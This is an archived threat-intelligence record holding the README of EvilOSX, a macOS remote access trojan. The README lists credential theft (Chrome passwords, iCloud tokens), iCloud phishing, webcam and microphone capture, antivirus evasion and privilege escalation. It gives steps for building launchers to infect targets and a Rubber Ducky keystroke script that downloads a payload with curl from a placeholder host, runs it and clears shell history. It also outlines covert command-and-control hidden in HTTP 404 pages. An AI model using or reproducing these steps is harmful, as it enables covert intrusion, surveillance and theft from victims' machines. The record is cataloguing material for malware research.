{
	"id": "909e38f8-a125-402b-b1da-5cd43474a465",
	"created_at": "2026-04-06T00:13:27.839064Z",
	"updated_at": "2026-04-10T13:12:12.552946Z",
	"deleted_at": null,
	"sha1_hash": "b2120a5554cbd412408f7c79fc3a11b16f249eff",
	"title": "GitHub - Marten4n6/EvilOSX: An evil RAT (Remote Administration Tool) for macOS / OS X.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 134871,
	"plain_text": "GitHub - Marten4n6/EvilOSX: An evil RAT (Remote Administration Tool) for macOS / OS X.\r\nBy Marten4n6\r\nArchived: 2026-04-05 14:03:15 UTC\r\nAn evil RAT (Remote Administration Tool) for macOS / OS X.\r\nlicense GPLv3\r\npython 2.7, 3.7 issues 42 open 404 badge not found contributions welcome\r\nMarco Generator by Cedric Owens\r\nThis project is no longer active\r\nFeatures\r\nEmulate a terminal instance\r\nSimple extendable module system\r\nNo bot dependencies (pure python)\r\nUndetected by anti-virus (OpenSSL AES-256 encrypted payloads)\r\nPersistent\r\nGUI and CLI support\r\nRetrieve Chrome passwords\r\nRetrieve iCloud tokens and contacts\r\nRetrieve/monitor the clipboard\r\nRetrieve browser history (Chrome and Safari)\r\nPhish for iCloud passwords via iTunes\r\niTunes (iOS) backup enumeration\r\nRecord the microphone\r\nTake a desktop screenshot or picture using the webcam\r\nAttempt to get root via local privilege escalation\r\nHow To Use\r\n# Clone or download this repository\r\n$ git clone https://github.com/Marten4n6/EvilOSX\r\n# Go into the repository\r\n$ cd EvilOSX\r\nhttps://github.com/Marten4n6/EvilOSX\r\nPage 1 of 5\r\n# Install dependencies required by the server\r\n$ sudo pip install -r requirements.txt\r\n# Start the GUI\r\n$ python start.py\r\n# Lastly, run a built launcher on your target(s)\r\nWarning: Because payloads are created unique to the target system (automatically by the server), the server must be running when any bot connects for the first time.\r\nAdvanced users\r\nThere's also a CLI for those who want to use this over SSH:\r\n# Create a launcher to infect your target(s)\r\n$ python start.py --builder\r\n# Start the CLI\r\n$ python start.py --cli --port 1337\r\n# Lastly, run a built launcher on your target(s)\r\nScreenshots\r\nMotivation\r\nThis project was created to be used with my Rubber Ducky, here's the simple script:\r\nREM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX\r\nREM See also: https://ducktoolkit.com/vidpid/\r\nDELAY 1000\r\nGUI SPACE\r\nDELAY 500\r\nSTRING Termina\r\nDELAY 1000\r\nENTER\r\nDELAY 1500\r\nREM Kill all terminals after x seconds\r\nSTRING screen -dm bash -c 'sleep 6; killall Terminal'\r\nENTER\r\nSTRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear\r\nENTER\r\nIt takes about 10 seconds to backdoor any unlocked Mac, which is... nice\r\nTerminal is spelt that way intentionally; on some systems Spotlight won't find the terminal otherwise.\r\nTo bypass the keyboard setup assistant, make sure you change the VID\u0026PID, which can be found here.\r\nAluminum Keyboard (ISO) is probably the one you are looking for.\r\nVersioning\r\nEvilOSX will be maintained under the Semantic Versioning guidelines as much as possible.\r\nServer and bot releases will be numbered with the following format:\r\nAnd constructed with the following guidelines:\r\nBreaking backward compatibility (with older bots) bumps the major\r\nNew additions without breaking backward compatibility bump the minor\r\nBug fixes and misc changes bump the patch\r\nFor more information on SemVer, please visit https://semver.org/.\r\nDesign Notes\r\nInfecting a machine is split up into three parts:\r\nA launcher is run on the target machine whose only goal is to run the stager\r\nThe stager asks the server for a loader which handles how a payload will be loaded\r\nThe loader is given a uniquely encrypted payload and then sent back to the stager\r\nThe server hides its communications by sending messages hidden in HTTP 404 error pages (from BlackHat's \"Hiding In Plain Sight\")\r\nCommand requests are retrieved from the server via a GET request\r\nCommand responses are sent to the server via a POST request\r\nModules take advantage of Python's dynamic nature: they are simply sent over the network compressed with zlib, along with any configuration options\r\nSince the bot only communicates with the server and never the other way around, the server has no way of knowing when a bot goes offline\r\nIssues\r\nFeel free to submit any issues or feature requests here.\r\nContributing\r\nFor a simple guide on how to create modules click here.\r\nCredits\r\nThe awesome Empire project\r\nShoutout to Patrick Wardle for his awesome talks, check out Objective-See\r\nmanwhoami for his projects: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts (now deleted... let me know if you reappear)\r\nThe slowloris module is pretty much copied from PySlowLoris\r\nurwid and this code which saved me a lot of time with the CLI\r\nLogo created by motusora\r\nLicense\r\nGPLv3\r\nSource: https://github.com/Marten4n6/EvilOSX",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://github.com/Marten4n6/EvilOSX"
	],
	"report_names": [
		"EvilOSX"
	],
	"threat_actors": [],
	"ts_created_at": 1775434407,
	"ts_updated_at": 1775826732,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b2120a5554cbd412408f7c79fc3a11b16f249eff.pdf",
		"text": "https://archive.orkl.eu/b2120a5554cbd412408f7c79fc3a11b16f249eff.txt",
		"img": "https://archive.orkl.eu/b2120a5554cbd412408f7c79fc3a11b16f249eff.jpg"
	}
}